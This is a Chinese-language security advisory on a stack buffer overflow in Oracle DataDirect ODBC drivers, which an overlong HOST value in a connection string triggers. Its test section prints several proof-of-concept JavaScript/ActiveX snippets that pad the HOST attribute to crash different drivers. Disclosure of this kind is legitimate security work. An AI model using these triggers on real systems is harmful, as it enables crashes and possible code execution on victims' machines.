受影响系统:
Oracle DataDirect
Oracle Hyperion Performance Management and BI 11.1.2.1.0
描述:
BUGTRAQ ID: 50305
Oracle DataDirect是一款高性能商业的数据访问组件。
Oracle DataDirect安装了多个驱动以允许软件从ODBC数据源中获得信息,部分产品存在远程栈缓冲区溢出,在连接字符串中指定超长HOST属性后,当arsqls24.dll进行unicode/ASCII转换时可触发此漏洞。
<*来源:rgod (rgod@autistici.org)
链接:http://www.securityfocus.com/archive/1/520169
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script> var obj = new ActiveXObject(“ADODB.Connection”); x=””; for (i=0;i<666;i++){x = x + “AAAA”} obj.ConnectionString =”DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=” + x + “;IP=127.0.0.1;PORT=9;DB=xxxxxx;UID=sa;PWD=null”; obj.Open(); </script> <!– saved from url=(0014)about:internet –> <script> var obj = new ActiveXObject(“ADODB.Connection”); x=””; for (i=0;i<1666;i++){x = x + “AAAA”} obj.ConnectionString =”DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=” + x + “;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null”; obj.Open(); </script> <!– saved from url=(0014)about:internet –> <script> var obj = new ActiveXObject(“ADODB.Connection”); x=””; for (i=0;i<1666;i++){x = x + “AAAA”} obj.ConnectionString =”DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=” + x + “;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null”; obj.Open(); </script> <!– saved from url=(0014)about:internet –> <script> var obj = new ActiveXObject(“ADODB.Connection”); x=””; for (i=0;i<1666;i++){x = x + “AAAA”} obj.ConnectionString =”DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=” + x +”;UID=system;PWD=XXXXXXXXX;”; obj.Open(); </script> <!– saved from url=(0014)about:internet –> <script> var obj = new ActiveXObject(“ADODB.Connection”); x=””; for (i=0;i<700;i++){x = x + “AAAA”} obj.ConnectionString =”DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=” + x + “;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null”; obj.Open(); </script> //0.07 20/10/2011 – rgod original url: http://retrogod.altervista.org/9sg_oracle_datadirect.htm
建议:
厂商补丁:
Oracle
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。